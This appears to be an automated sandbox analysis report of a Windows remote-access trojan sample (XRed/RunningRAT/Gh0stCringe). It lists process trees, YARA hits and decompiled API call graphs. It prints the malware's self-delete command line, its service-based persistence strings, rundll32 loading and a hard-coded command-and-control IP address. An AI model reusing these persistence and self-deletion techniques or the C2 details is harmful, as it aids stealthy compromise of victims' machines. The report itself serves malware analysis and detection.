                                                                                        Start time:16:10:59
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Users\user\Desktop\blq.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\blq.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:820'736 bytes
                                                                                        MD5 hash:6153A06B74491BACB664BF142B598C69
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:Borland Delphi
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_RunningRAT, Description: Yara detected RunningRAT, Source: 00000000.00000003.1660121834.0000000000716000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:16:10:59
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Users\user\Desktop\._cache_blq.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\._cache_blq.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:49'152 bytes
                                                                                        MD5 hash:2C8E6B45F0113B45F9187B60DF114FEF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Gh0stCringe, Description: Yara detected Gh0stCringe, Source: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_RunningRAT, Description: Yara detected RunningRAT, Source: 00000001.00000000.1659507821.0000000000403000.00000008.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_RunningRAT, Description: Yara detected RunningRAT, Source: C:\Users\user\Desktop\._cache_blq.exe, Author: Joe Security
                                                                                        • Rule: GoldDragon_RunningRAT, Description: Detects Running RAT from Gold Dragon report, Source: C:\Users\user\Desktop\._cache_blq.exe, Author: Florian Roth
                                                                                        • Rule: MALWARE_Win_RunningRAT, Description: Detects RunningRAT, Source: C:\Users\user\Desktop\._cache_blq.exe, Author: ditekSHen
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:16:11:00
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\svchost.exe -k "encvbk"
                                                                                        Imagebase:0x830000
                                                                                        File size:46'504 bytes
                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:16:11:00
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                        Imagebase:0x400000
                                                                                        File size:771'584 bytes
                                                                                        MD5 hash:64C0A5B375F1AB0C44808320D5AF9E84
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:Borland Delphi
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_RunningRAT, Description: Detects RunningRAT, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: ditekSHen
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 92%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:16:11:00
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\svchost.exe -k "encvbk"
                                                                                        Imagebase:0x830000
                                                                                        File size:46'504 bytes
                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Gh0stCringe, Description: Yara detected Gh0stCringe, Source: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:5
                                                                                        Start time:16:11:00
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                        Imagebase:0x430000
                                                                                        File size:53'161'064 bytes
                                                                                        MD5 hash:4A871771235598812032C822E6F68F19
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:6
                                                                                        Start time:16:11:02
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\._cache_blq.exe"
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:16:11:02
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:8
                                                                                        Start time:16:11:02
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:ping 127.0.0.1 -n 1
                                                                                        Imagebase:0x9d0000
                                                                                        File size:18'944 bytes
                                                                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:16:11:03
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff6eef20000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:10
                                                                                        Start time:16:11:04
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\encvbk.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\encvbk.exe "c:\program files (x86)\6795234.dll",MainThread
                                                                                        Imagebase:0xdd0000
                                                                                        File size:61'440 bytes
                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Gh0stCringe, Description: Yara detected Gh0stCringe, Source: 0000000A.00000002.4129317792.0000000010006000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:11
                                                                                        Start time:16:11:13
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:771'584 bytes
                                                                                        MD5 hash:64C0A5B375F1AB0C44808320D5AF9E84
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:Borland Delphi
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:15
                                                                                        Start time:16:12:16
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                        Imagebase:0x7ff6eef20000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:16
                                                                                        Start time:16:12:16
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 212 -p 7644 -ip 7644
                                                                                        Imagebase:0xc30000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:17
                                                                                        Start time:16:12:16
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 7644 -ip 7644
                                                                                        Imagebase:0xc30000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:18
                                                                                        Start time:16:12:16
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16120
                                                                                        Imagebase:0xc30000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:19
                                                                                        Start time:16:12:16
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16140
                                                                                        Imagebase:0xc30000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:21
                                                                                        Start time:16:12:40
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 7644 -ip 7644
                                                                                        Imagebase:0xc30000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:22
                                                                                        Start time:16:12:40
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16196
                                                                                        Imagebase:0xc30000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:23
                                                                                        Start time:16:13:03
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\splwow64.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\splwow64.exe 12288
                                                                                        Imagebase:0x7ff6d5370000
                                                                                        File size:163'840 bytes
                                                                                        MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:24
                                                                                        Start time:16:13:04
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
                                                                                        Imagebase:0x7ff6eef20000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false


                                                                                          Execution Graph

                                                                                          Execution Coverage:28.6%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:7.3%
                                                                                          Total number of Nodes:179
                                                                                          Total number of Limit Nodes:4

                                                                                          Callgraph


                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004017A8
                                                                                          • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 004017BA
                                                                                          • GetProcAddress.KERNEL32(?,Process32First), ref: 004017CF
                                                                                          • GetProcAddress.KERNEL32(?,Process32Next), ref: 004017E1
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004017F5
                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 00401819
                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 0040182C
                                                                                          • lstrcmpiA.KERNEL32(00000000,?), ref: 00401843
                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 0040185C
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0040186C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryProcess32$CloseCreateFirstFreeHandleLoadNextSnapshotToolhelp32lstrcmpi
                                                                                          • String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
                                                                                          • API String ID: 653906424-4285911020
                                                                                          • Opcode ID: 1fd417c11413756bd4715d1432974552d424e7ffcafe747e360662e6f791f9bc
                                                                                          • Instruction ID: e698cd54efef0762fd02a762dd22e0b3df5000b7872fc78e3db917c3bca36737
                                                                                          • Opcode Fuzzy Hash: 1fd417c11413756bd4715d1432974552d424e7ffcafe747e360662e6f791f9bc
                                                                                          • Instruction Fuzzy Hash: 39210E75D41218EFDB10EFA0D949BEEBBB8FB48301F10846AE505B2290D7749B80CF54

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(shell32.dll,?), ref: 00401B80
                                                                                          • GetProcAddress.KERNEL32(?,ShellExecuteA), ref: 00401B98
                                                                                          • __p__pgmptr.MSVCRT ref: 00401BBA
                                                                                          • sprintf.MSVCRT ref: 00401BCF
                                                                                          • GetCurrentProcess.KERNEL32(00000100), ref: 00401BDD
                                                                                          • SetPriorityClass.KERNELBASE(00000000), ref: 00401BE4
                                                                                          • GetCurrentThread.KERNEL32 ref: 00401BEC
                                                                                          • SetThreadPriority.KERNELBASE(00000000), ref: 00401BF3
                                                                                          • ShellExecuteA.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00401C10
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentPriorityThread$AddressClassExecuteLibraryLoadProcProcessShell__p__pgmptrsprintf
                                                                                          • String ID: /c ping 127.0.0.1 -n 1 && del /f/q "%s"$ShellExecuteA$cmd.exe$open$shell32.dll
                                                                                          • API String ID: 239697722-3584563708
                                                                                          • Opcode ID: 7249951d3074dcb4a7fe4bb46aef8e51ce1700dc43be1304f4320e222d999fe6
                                                                                          • Instruction ID: 03b7caf6ff0ed763f8f9b181b84943af9cfe637eb8e7dbc85a8f0fb9157acd93
                                                                                          • Opcode Fuzzy Hash: 7249951d3074dcb4a7fe4bb46aef8e51ce1700dc43be1304f4320e222d999fe6
                                                                                          • Instruction Fuzzy Hash: 5A11A171E44208ABEB109FA4DD0ABD9BB7CAB08702F0000B5F645F61D1CBF45A848F69

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 0 401134-4011b9 #2621 Sleep GetCommandLineA strstr Sleep 1 401305-4013cb Sleep LoadLibraryA GetProcAddress Sleep LoadLibraryA GetProcAddress Sleep GetProcAddress wsprintfA CreateMutexA 0->1 2 4011bf-40120c wsprintfA call 401c18 0->2 3 4013e2-401464 CloseHandle Sleep GetProcAddress Sleep ExpandEnvironmentStringsA Sleep GetFileAttributesA 1->3 4 4013cd-4013d8 GetLastError 1->4 9 401212-4012d9 lstrcpyA call 401c18 wsprintfA call 401c18 2->9 10 4012df 2->10 19 4014e2-401526 GetTickCount wsprintfA Sleep call 401aee 3->19 20 401466-40146d 3->20 4->3 6 4013da-4013dd 4->6 8 4016da-4016ea 6->8 28 4012db 9->28 29 4012dd-4012ee call 401aee 9->29 12 4012f3-401300 call 401b6b 10->12 12->8 32 401528-401535 call 401b6b 19->32 33 40153a-4015b4 Sleep call 401794 19->33 21 401491-4014de #537 call 4016eb #800 GetFileAttributesA 20->21 22 40146f-401476 20->22 21->19 35 4014e0 21->35 22->21 25 401478-40148f ExpandEnvironmentStringsA 22->25 25->19 28->12 29->12 32->8 40 4015c0-4015da LoadLibraryA 33->40 41 4015b6 33->41 35->25 42 4015e0-401607 Sleep GetProcAddress 40->42 43 4016b3-4016ba 40->43 41->40 46 401609 42->46 47 40160b-401612 42->47 44 4016d0-4016d8 Sleep 43->44 45 4016bc-4016c3 43->45 44->8 45->44 48 4016c5-4016cb call 401b6b 45->48 49 40162b-40168f call 40187b wsprintfA 46->49 50 4016a6-4016ad FreeLibrary 47->50 51 401618-401627 47->51 48->44 58 401691-401698 FreeLibrary 49->58 59 40169e-4016a0 Sleep 49->59 50->43 51->49 56 401629 51->56 56->50 58->59 59->50
                                                                                          APIs
                                                                                          • #2621.MFC42 ref: 00401162
                                                                                          • Sleep.KERNELBASE(00000000), ref: 0040116A
                                                                                          • GetCommandLineA.KERNEL32 ref: 00401170
                                                                                          • strstr.MSVCRT ref: 00401188
                                                                                          • Sleep.KERNELBASE(00000000), ref: 004011AF
                                                                                          • wsprintfA.USER32 ref: 004011DE
                                                                                            • Part of subcall function 00401C18: memset.MSVCRT ref: 00401C59
                                                                                            • Part of subcall function 00401C18: memset.MSVCRT ref: 00401C69
                                                                                            • Part of subcall function 00401C18: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 00401C76
                                                                                            • Part of subcall function 00401C18: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 00401C8E
                                                                                            • Part of subcall function 00401C18: GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 00401CA3
                                                                                            • Part of subcall function 00401C18: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 00401CB8
                                                                                            • Part of subcall function 00401C18: FreeLibrary.KERNEL32(00000000), ref: 00401D62
                                                                                          • lstrcpyA.KERNEL32(encvbk,?,80000002,?,DisplayName,00000001,System Remote Data Simulation Layer), ref: 0040121E
                                                                                            • Part of subcall function 00401C18: lstrcpyA.KERNEL32(?,?), ref: 00401D1F
                                                                                          • wsprintfA.USER32 ref: 0040125A
                                                                                          • Sleep.KERNEL32(00000000), ref: 00401307
                                                                                          • LoadLibraryA.KERNELBASE(shell32.dll), ref: 00401312
                                                                                          • GetProcAddress.KERNEL32(?,ShellExecuteA), ref: 0040132A
                                                                                          • Sleep.KERNELBASE(00000000), ref: 00401338
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00401343
                                                                                          • GetProcAddress.KERNEL32(?,CreateMutexA), ref: 0040135B
                                                                                          • Sleep.KERNELBASE(00000001), ref: 00401369
                                                                                          • GetProcAddress.KERNEL32(?,ReleaseMutex), ref: 0040137B
                                                                                          • wsprintfA.USER32 ref: 004013A4
                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 004013B8
                                                                                          • GetLastError.KERNEL32 ref: 004013CD
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004013F6
                                                                                          • Sleep.KERNELBASE(00000000), ref: 004013FE
                                                                                          • GetProcAddress.KERNEL32(?,GetVersionExA), ref: 00401410
                                                                                          • Sleep.KERNELBASE(00000000), ref: 0040142F
                                                                                          • ExpandEnvironmentStringsA.KERNEL32(%ProgramFiles%\,?,00000104), ref: 00401446
                                                                                          • Sleep.KERNEL32(00000000), ref: 0040144E
                                                                                          • GetFileAttributesA.KERNELBASE(?), ref: 0040145B
                                                                                          • ExpandEnvironmentStringsA.KERNEL32(%Temp%\,?,00000104), ref: 00401489
                                                                                          • #537.MFC42(?), ref: 0040149E
                                                                                            • Part of subcall function 004016EB: _access.MSVCRT ref: 00401714
                                                                                          • #800.MFC42(?,?), ref: 004014C9
                                                                                          • GetFileAttributesA.KERNEL32(?,?,?), ref: 004014D5
                                                                                          • GetTickCount.KERNEL32 ref: 004014E2
                                                                                          • wsprintfA.USER32 ref: 004014FC
                                                                                          • Sleep.KERNEL32(00000000), ref: 00401507
                                                                                          • Sleep.KERNELBASE(00000000,00000000), ref: 00401546
                                                                                          • LoadLibraryA.KERNELBASE(00000000,360tray.exe), ref: 004015C7
                                                                                          • Sleep.KERNELBASE(00000000), ref: 004015E2
                                                                                          • GetProcAddress.KERNEL32(00000000,Install), ref: 004015F4
                                                                                          • wsprintfA.USER32 ref: 00401662
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00401698
                                                                                          • Sleep.KERNEL32(00000000), ref: 004016A0
                                                                                          • FreeLibrary.KERNELBASE(00000000), ref: 004016AD
                                                                                          • Sleep.KERNELBASE(00000000), ref: 004016D2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep$AddressProc$Library$wsprintf$Load$Free$AttributesEnvironmentExpandFileStringslstrcpymemset$#2621#537#800CloseCommandCountCreateErrorHandleLastLineMutexTick_accessstrstr
                                                                                          • String ID: "%s",MainThread$%ProgramFiles%\$%Temp%\$%s%d.dll$%s:%d:%s$103.36.221.195$360tray.exe$CreateMutexA$Description$DisplayName$GUpdate$GetVersionExA$Install$ReleaseMutex$SYSTEM\CurrentControlSet\Services\%s$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll$ShellExecuteA$System Remote Data Simulation Layer$encvbk$kernel32.dll$open$rundll32.exe$shell32.dll
                                                                                          • API String ID: 2440389195-3701194357
                                                                                          • Opcode ID: 33c2655f0df4c5bdb74095cc6ef8f893952d5ebb8828a241915ac991c88762e1
                                                                                          • Instruction ID: 3e4d9021d073eed2ebaccca2140894c21fcc0a3ec56120faac2ae3b4723efbfb
                                                                                          • Opcode Fuzzy Hash: 33c2655f0df4c5bdb74095cc6ef8f893952d5ebb8828a241915ac991c88762e1
                                                                                          • Instruction Fuzzy Hash: 68E17E70945258DFEB20DB64CD49BDEBB79AB44306F0041EAE109B62E1CB795F84CF29

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                          • String ID:
                                                                                          • API String ID: 801014965-0
                                                                                          • Opcode ID: c6672fdfefc484d33459fe495202c256ca6675a5ab502eee85e92a4fdfc38f08
                                                                                          • Instruction ID: 41b20fb36615245da369ed675267998572c4bc05a5f1d3210e4b8a6eebd3b03a
                                                                                          • Opcode Fuzzy Hash: c6672fdfefc484d33459fe495202c256ca6675a5ab502eee85e92a4fdfc38f08
                                                                                          • Instruction Fuzzy Hash: 1C415DB1A40308AFDB209FA4DA49A5ABFA8AB09711F20017FF451B73E1D7B84941CB59

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 92 401000-40102a CreateFileA 93 401030-40104c WriteFile 92->93 94 40102c 92->94 95 401052-401062 CloseHandle 93->95 96 40104e 93->96 94->93 96->95
                                                                                          APIs
                                                                                          • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0040101D
                                                                                          • WriteFile.KERNELBASE(000000FF,004032A0,00006600,?,00000000), ref: 00401044
                                                                                          • CloseHandle.KERNELBASE(000000FF), ref: 00401056
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                          • String ID:
                                                                                          • API String ID: 1065093856-0
